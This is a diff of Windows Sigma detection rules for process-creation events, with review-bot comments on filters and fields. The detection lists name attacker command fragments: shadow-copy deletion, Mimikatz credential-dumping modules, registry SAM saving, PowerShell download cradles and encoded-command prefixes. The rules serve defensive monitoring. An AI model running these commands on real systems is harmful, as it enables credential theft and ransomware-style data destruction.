@@ -29,48 +28,46 @@ detection: EventID: 4688 Channel: Security selection1_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - \diskshadow.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE - - diskshadow.exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - \diskshadow.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE + - diskshadow.exe selection1_cli: - CommandLine|contains|all: - - shadow + CommandLine|contains|all: + - shadow # will match "delete shadows" and "shadowcopy delete" and "shadowstorage" - delete selection2_img: - - NewProcessName|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - NewProcessName|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection2_cli: - CommandLine|contains|all: + CommandLine|contains|all: - delete - catalog - - quiet + - quiet # will match -quiet or /quiet selection3_img: - - NewProcessName|endswith: \vssadmin.exe - - OriginalFileName: VSSADMIN.EXE + - NewProcessName|endswith: \vssadmin.exe + - OriginalFileName: VSSADMIN.EXE selection3_cli: - CommandLine|contains|all: + CommandLine|contains|all: - resize - shadowstorage - CommandLine|contains: + CommandLine|contains: - unbounded - /MaxSize= - condition: process_creation and ((all of selection1*) or (all of selection2*) - or (all of selection3*)) + condition: process_creation and ((all of selection1*) or (all of selection2*) or (all of selection3*)) fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate Administrator deletes Shadow Copies using operating systems utilities - for legitimate reason + - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) level: high ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml b/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml index d9d93f804..8e0bae151 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml @@ -1,8 +1,7 @@ title: Windows Shell/Scripting Processes Spawning Suspicious Programs id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde status: test -description: Detects suspicious child processes of a Windows shell and scripting processes - such as wscript, rundll32, powershell, mshta...etc. +description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html author: Florian Roth (Nextron Systems), Tim Shelton @@ -26,12 +25,13 @@ detection: - \mshta.exe - \powershell.exe - \pwsh.exe + # - '\cmd.exe' # too many false positives - \rundll32.exe - \cscript.exe - \wscript.exe - \wmiprvse.exe - \regsvr32.exe - NewProcessName|endswith: + NewProcessName|endswith: - \schtasks.exe - \nslookup.exe - \certutil.exe 
@@ -41,24 +41,25 @@ detection: CurrentDirectory|contains: \ccmcache\ filter_amazon: ParentCommandLine|contains: + # FP - Amazon Workspaces - \Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1 - - \nessus_ + - \nessus_ # Tenable/Nessus VA Scanner filter_nessus: - CommandLine|contains: \nessus_ + CommandLine|contains: \nessus_ # Tenable/Nessus VA Scanner filter_sccm_install: ParentCommandLine|contains|all: - C:\MEM_Configmgr_ - \splash.hta - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}' - CommandLine|contains|all: + CommandLine|contains|all: - C:\MEM_Configmgr_ - \SMSSETUP\BIN\ - \autorun.hta - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}' ParentProcessName|endswith: \mshta.exe - NewProcessName|endswith: \mshta.exe + NewProcessName|endswith: \mshta.exe condition: process_creation and (selection and not 1 of filter_*) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml b/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml index f5953a1d3..92f38922c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml @@ -1,8 +1,7 @@ title: Process Creation Using Sysnative Folder id: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab status: test -description: Detects process creation events that use the Sysnative folder (common - for CobaltStrike spawns) +description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) references: - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ author: Max Altgelt (Nextron Systems) 
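Review bot: In the first hunk the `\nessus_ # Tenable/Nessus VA Scanner` entry remains under `filter_amazon`, whose new `# FP - Amazon Workspaces` header comment now mislabels it, while the dedicated `filter_nessus` selection directly below only checks `CommandLine`. Moving the parent-command-line exclusion next to its sibling keeps each filter named for what it excludes: `filter_nessus:` / `    - CommandLine|contains: \nessus_` / `    - ParentCommandLine|contains: \nessus_` (a list of maps, so either field matches), with `filter_amazon` left purely for the WorkSpaces scripts. The `condition: process_creation and (selection and not 1 of filter_*)` line visible at the end of the hunk already covers any filter name, so no condition change is needed.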
@@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security sysnative: - - CommandLine|contains: :\Windows\Sysnative\ - - NewProcessName|contains: :\Windows\Sysnative\ + - CommandLine|contains: :\Windows\Sysnative\ + - NewProcessName|contains: :\Windows\Sysnative\ condition: process_creation and sysnative falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml index 73229d3df..f2aa87a1f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml @@ -5,8 +5,7 @@ description: Detects a Windows program executable started from a suspicious fold references: - https://twitter.com/GelosSnake/status/934900723426439170 - https://asec.ahnlab.com/en/39828/ -author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, - Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 modified: 2023/10/18 tags: @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \svchost.exe - \rundll32.exe - \services.exe 
@@ -69,21 +68,23 @@ detection: - \dwm.exe - \LsaIso.exe - \ntoskrnl.exe + # The below processes were seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/ - \wsmprovhost.exe - \dfrgui.exe filter_generic: - - NewProcessName|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\WinSxS\ - - NewProcessName|contains: \SystemRoot\System32\ - - NewProcessName: - - C:\Windows\explorer.exe - - C:\Program Files\PowerShell\7\pwsh.exe - - C:\Program Files\PowerShell\7-preview\pwsh.exe + - NewProcessName|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\WinSxS\ + # - 'C:\avast! sandbox' + - NewProcessName|contains: \SystemRoot\System32\ + - NewProcessName: + - C:\Windows\explorer.exe + - C:\Program Files\PowerShell\7\pwsh.exe + - C:\Program Files\PowerShell\7-preview\pwsh.exe filter_wsl_windowsapps: - NewProcessName|startswith: C:\Program Files\WindowsApps\MicrosoftCorporationII.WindowsSubsystemForLinux - NewProcessName|endswith: \wsl.exe + NewProcessName|startswith: C:\Program Files\WindowsApps\MicrosoftCorporationII.WindowsSubsystemForLinux + NewProcessName|endswith: \wsl.exe condition: process_creation and (selection and not 1 of filter_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 75fbf21e3..4c9bdcc5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml 
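Review bot: `filter_generic`'s `NewProcessName|startswith` entries hard-code `C:\Windows\System32\`, `C:\Windows\SysWOW64\` and `C:\Windows\WinSxS\`, whereas the sibling `NewProcessName|contains: \SystemRoot\System32\` entry is drive-agnostic; on a host whose system drive is not C:, every legitimate system binary named in `selection` would miss the filter and alert. Switching those three to `NewProcessName|contains:` with `:\Windows\System32\`, `:\Windows\SysWOW64\` and `:\Windows\WinSxS\` keeps the exclusion equivalent for any drive letter. The same hard-coded drive letter appears in `selection2` of proc_creation_win_susp_task_folder_evasion.yml further down. The newly added `# - 'C:\avast! sandbox'` line gives no reason for being kept disabled; a one-line note next to it would stop the next maintainer from guessing. The `selection` list this filter applies to starts before the hunk.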
@@ -1,8 +1,7 @@ title: Suspicious SYSTEM User Process Creation id: 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 status: test -description: Detects a suspicious process creation as SYSTEM user (suspicious program - or command line parameter) +description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) references: - Internal Research - https://tools.thehacker.recipes/mimikatz/modules 
@@ -25,74 +24,75 @@ detection: Channel: Security selection: MandatoryLabel: S-1-16-16384 - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_special: - - NewProcessName|endswith: - - \calc.exe - - \wscript.exe - - \cscript.exe - - \hh.exe - - \mshta.exe - - \forfiles.exe - - \ping.exe - - CommandLine|contains: - - ' -NoP ' - - ' -W Hidden ' - - ' -decode ' - - ' /decode ' - - ' /urlcache ' - - ' -urlcache ' - - ' -e* JAB' - - ' -e* SUVYI' - - ' -e* SQBFAFgA' - - ' -e* aWV4I' - - ' -e* IAB' - - ' -e* PAA' - - ' -e* aQBlAHgA' - - vssadmin delete shadows - - reg SAVE HKLM - - ' -ma ' - - Microsoft\Windows\CurrentVersion\Run - - .downloadstring( - - .downloadfile( - - ' /ticket:' - - 'dpapi::' - - event::clear - - event::drop - - id::modify - - 'kerberos::' - - 'lsadump::' - - 'misc::' - - 'privilege::' - - 'rpc::' - - 'sekurlsa::' - - 'sid::' - - 'token::' - - vault::cred - - vault::list - - ' p::d ' - - ;iex( - - MiniDump - - 'net user ' + - NewProcessName|endswith: + - \calc.exe + - \wscript.exe + - \cscript.exe + - \hh.exe + - \mshta.exe + - \forfiles.exe + - \ping.exe + - CommandLine|contains: + # - 'sc stop ' # stops a system service # causes FPs + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' -decode ' # Used with certutil + - ' /decode ' # Used with certutil + - ' /urlcache ' # Used with certutil + - ' -urlcache ' # Used with certutil + - ' -e* JAB' # PowerShell encoded commands + - ' -e* SUVYI' # PowerShell encoded commands + - ' -e* SQBFAFgA' # PowerShell encoded commands + - ' -e* aWV4I' # PowerShell encoded commands + - ' -e* IAB' # PowerShell encoded commands + - ' -e* PAA' # PowerShell encoded commands + - ' -e* aQBlAHgA' # PowerShell encoded commands + - vssadmin delete shadows # Ransomware + - reg SAVE HKLM # save registry SAM - syskey extraction + - ' -ma ' # ProcDump + - Microsoft\Windows\CurrentVersion\Run 
# Run key in command line - often in combination with REG ADD + - .downloadstring( # PowerShell download command + - .downloadfile( # PowerShell download command + - ' /ticket:' # Rubeus + - 'dpapi::' # Mimikatz + - event::clear # Mimikatz + - event::drop # Mimikatz + - id::modify # Mimikatz + - 'kerberos::' # Mimikatz + - 'lsadump::' # Mimikatz + - 'misc::' # Mimikatz + - 'privilege::' # Mimikatz + - 'rpc::' # Mimikatz + - 'sekurlsa::' # Mimikatz + - 'sid::' # Mimikatz + - 'token::' # Mimikatz + - vault::cred # Mimikatz + - vault::list # Mimikatz + - ' p::d ' # Mimikatz + - ;iex( # PowerShell IEX + - MiniDump # Process dumping method apart from procdump + - 'net user ' filter_ping: - CommandLine: ping 127.0.0.1 -n 5 + CommandLine: ping 127.0.0.1 -n 5 filter_vs: ParentCommandLine|contains: \DismFoDInstall.cmd - NewProcessName|endswith: \PING.EXE + NewProcessName|endswith: \PING.EXE filter_config_mgr: ParentProcessName|contains: :\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\ filter_java: - CommandLine|contains: ' -ma ' + CommandLine|contains: ' -ma ' ParentProcessName|contains: - :\Program Files (x86)\Java\ - :\Program Files\Java\ ParentProcessName|endswith: \bin\javaws.exe - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\Java\ - :\Program Files\Java\ - NewProcessName|endswith: \bin\jp2launcher.exe + NewProcessName|endswith: \bin\jp2launcher.exe condition: process_creation and (all of selection* and not 1 of filter_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml b/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml index d939496ba..84f779aa1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml 
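Review bot: `SubjectUserName|contains: AUTHORI`/`AUTORI` looks like a carry-over from a `User`-field match: in a 4688 event the account name and the `NT AUTHORITY` domain are split across `SubjectUserName` and `SubjectDomainName`, so this selection may never match and the rule would stay silent; this is worth confirming against a captured SYSTEM-spawned 4688 event and, if so, matching on `SubjectDomainName` or relying on `MandatoryLabel: S-1-16-16384` alone. Separately, `- 'net user '` is now the only `CommandLine|contains` entry without a rationale comment; `- 'net user '  # account enumeration / creation` would make the list uniform. The `process_creation` selection of this `detection` block starts before the hunk.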
@@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SYSVOL\ - \policies\ condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml index 480e26c71..f4a04bffb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml @@ -1,15 +1,10 @@ title: Tasks Folder Evasion id: cc4e02ba-9c06-48e2-b09e-2500cace9ae0 status: test -description: 'The Tasks folder in system32 and syswow64 are globally writable paths. - - Adversaries can take advantage of this and load or influence any script hosts - or ANY .NET Application - - in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, - mshta, eventvwr - - ' +description: | + The Tasks folder in system32 and syswow64 are globally writable paths. + Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application + in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr references: - https://twitter.com/subTee/status/1216465628946563073 - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26 @@ -29,13 +24,13 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - 'echo ' - 'copy ' - 'type ' - file createnew selection2: - CommandLine|contains: + CommandLine|contains: - ' C:\Windows\System32\Tasks\' - ' C:\Windows\SysWow64\Tasks\' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml index c4401ff49..df722b499 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml @@ -1,14 +1,9 @@ title: Malicious Windows Script Components File Execution by TAEF Detection id: 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b status: test -description: 'Windows Test Authoring and Execution Framework (TAEF) framework allows - you to run automation by executing tests files written on different languages - (C, C#, Microsoft COM Scripting interfaces - - Adversaries may execute malicious code (such as WSC file with VBScript, dll and - so on) directly by running te.exe - - ' +description: | + Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces + Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/ - https://twitter.com/pabraeken/status/993298228840992768 @@ -26,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \te.exe - - ParentProcessName|endswith: \te.exe - - OriginalFileName: \te.exe + - NewProcessName|endswith: \te.exe + - ParentProcessName|endswith: \te.exe + - OriginalFileName: \te.exe condition: process_creation and selection falsepositives: - It's not an uncommon to use te.exe directly to execute legal TAEF tests diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml index 7144b27f1..f88a62b08 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml 
@@ -1,20 +1,15 @@ title: Malicious PE Execution by Microsoft Visual Studio Debugger id: 15c7904e-6ad1-4a45-9b46-5fb25df37fd2 status: test -description: 'There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" - to launch specified executable and attach a debugger. - - This option may be used adversaries to execute malicious code by signed verified - binary. - +description: | + There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. + This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package. - - ' references: - https://twitter.com/pabraeken/status/990758590020452353 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/ - https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 -author: "Agro (@agro_sev), Ensar \u015Eamil (@sblmsrsn), oscd.community" +author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community date: 2020/10/14 modified: 2022/10/09 tags: @@ -30,9 +25,9 @@ detection: selection: ParentProcessName|endswith: \vsjitdebugger.exe reduction1: - NewProcessName|endswith: \vsimmersiveactivatehelper*.exe + NewProcessName|endswith: \vsimmersiveactivatehelper*.exe reduction2: - NewProcessName|endswith: \devenv.exe + NewProcessName|endswith: \devenv.exe condition: process_creation and (selection and not (reduction1 or reduction2)) falsepositives: - The process spawned by vsjitdebugger.exe is uncommon. diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml b/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml index 37197aba4..c6d2babc6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml 
@@ -20,10 +20,10 @@ detection: selection: ParentProcessName|endswith: \userinit.exe filter1: - CommandLine|contains: \netlogon\ + CommandLine|contains: \netlogon\ filter2: - - NewProcessName|endswith: \explorer.exe - - OriginalFileName: explorer.exe + - NewProcessName|endswith: \explorer.exe + - OriginalFileName: explorer.exe condition: process_creation and (selection and not 1 of filter*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml b/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml index ed4930d57..624b3bc80 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml @@ -1,9 +1,7 @@ title: Weak or Abused Passwords In CLI id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 status: test -description: Detects weak passwords or often abused passwords (seen used by threat - actors) via the CLI. An example would be a threat actor creating a new user via - the net command and providing the password inline +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -22,9 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Add more passwords - Asd123.aaaa - - password123 + - password123 # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - '123456789' - P@ssw0rd! - Decryptme 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml b/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml index a89b3b5fc..b8b5e679f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml @@ -1,21 +1,19 @@ title: Usage Of Web Request Commands And Cmdlets id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d related: - - id: 1139d2e2-84b1-4226-b445-354492eba8ba - type: similar - - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 - type: obsoletes - - id: cd5c8085-4070-4e22-908d-a5b3342deb74 - type: obsoletes + - id: 1139d2e2-84b1-4226-b445-354492eba8ba + type: similar + - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 + type: obsoletes + - id: cd5c8085-4070-4e22-908d-a5b3342deb74 + type: obsoletes status: test -description: Detects the use of various web request commands with commandline tools - and Windows PowerShell cmdlets (including aliases) via CommandLine +description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps -author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin - Songer @austinsonger +author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger date: 2019/10/24 modified: 2023/01/10 tags: @@ -29,7 +27,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - '[System.Net.WebRequest]::create' - 'curl ' - Invoke-RestMethod 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml b/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml index abf9c2b2e..244bae9b2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml @@ -1,8 +1,7 @@ title: WhoAmI as Parameter id: e9142d84-fbe0-401d-ac50-3e519fb00c89 status: test -description: Detects a suspicious process command line that uses whoami as first parameter - (as e.g. used by EfsPotato) +description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) references: - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: .exe whoami + CommandLine|contains: .exe whoami condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml b/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml index d45c9e252..1866c914b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \control.exe + NewProcessName|endswith: \control.exe ParentProcessName|endswith: \WorkFolders.exe filter: - NewProcessName: C:\Windows\System32\control.exe + NewProcessName: C:\Windows\System32\control.exe condition: process_creation and (selection and not filter) falsepositives: - Legitimate usage of the uncommon Windows Work Folders feature. 
diff --git a/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml b/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml index 2ddea0c9a..f1133021d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml +++ b/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml @@ -1,9 +1,7 @@ title: Suspect Svchost Activity id: 16c37b52-b141-42a5-a3ea-bbe098444397 status: test -description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments - and is normally observed when a malicious process spawns the process and injects - code into the process memory space. +description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. references: - https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2 author: David Burkett, @signalblur @@ -21,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: svchost.exe - NewProcessName|endswith: \svchost.exe + CommandLine|endswith: svchost.exe + NewProcessName|endswith: \svchost.exe filter: - - ParentProcessName|endswith: - - \rpcnet.exe - - \rpcnetp.exe - - CommandLine: null + - ParentProcessName|endswith: + - \rpcnet.exe + - \rpcnetp.exe + - CommandLine: # no CommandLine value available condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml b/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml index 2d83ac55e..e4e012e5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml 
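Review bot: `selection` requires `CommandLine|endswith: svchost.exe`, so the rule only fires on hosts where the "Include command line in process creation events" audit setting is enabled; when it is off the field is absent, the selection cannot match and the `- CommandLine:` filter never comes into play. A short `# requires command line auditing for 4688` comment on the selection, or a sentence under `falsepositives`, would save a deployer from assuming coverage they do not have. The bare `CommandLine:` now relies on YAML's implicit null where the previous explicit `null` made the "field absent" intent obvious; the same implicit form is introduced in `filter_null` of proc_creation_win_svchost_termserv_proc_spawn.yml and `filter_main_parent_null` of proc_creation_win_svchost_uncommon_parent_process.yml, and a trailing `# null: field not present` on each would restore that clarity.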
@@ -1,8 +1,7 @@ title: Terminal Service Process Spawn id: 1012f107-b8f1-4271-af30-5aed2de89b39 status: test -description: Detects a process spawned by the terminal service server process (this - could be an indicator for an exploitation of CVE-2019-0708) +description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ author: Florian Roth (Nextron Systems) @@ -26,13 +25,13 @@ detection: - \svchost.exe - termsvcs filter_img: - NewProcessName|endswith: + NewProcessName|endswith: - \rdpclip.exe - :\Windows\System32\csrss.exe - :\Windows\System32\wininit.exe - :\Windows\System32\winlogon.exe filter_null: - NewProcessName: null + NewProcessName: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml b/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml index 1d29ab363..fbdb19669 100644 --- a/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml @@ -16,7 +16,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \svchost.exe + NewProcessName|endswith: \svchost.exe filter_main_generic: ParentProcessName|endswith: - \Mrt.exe @@ -26,7 +26,7 @@ detection: - \services.exe - \TiWorker.exe filter_main_parent_null: - ParentProcessName: null + ParentProcessName: filter_main_parent_empty: ParentProcessName: - '-' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml index d90ba8826..64549809f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml @@ -1,16 +1,13 @@ title: Permission Check Via Accesschk.EXE id: c625d754-6a3d-4f65-9c9a-536aea960d37 status: test -description: Detects the usage of the "Accesschk" utility, an access and privilege - audit tool developed by SysInternal and often being abused by attacker to verify - process privileges +description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43 - https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat -author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/13 modified: 2023/02/20 tags: 
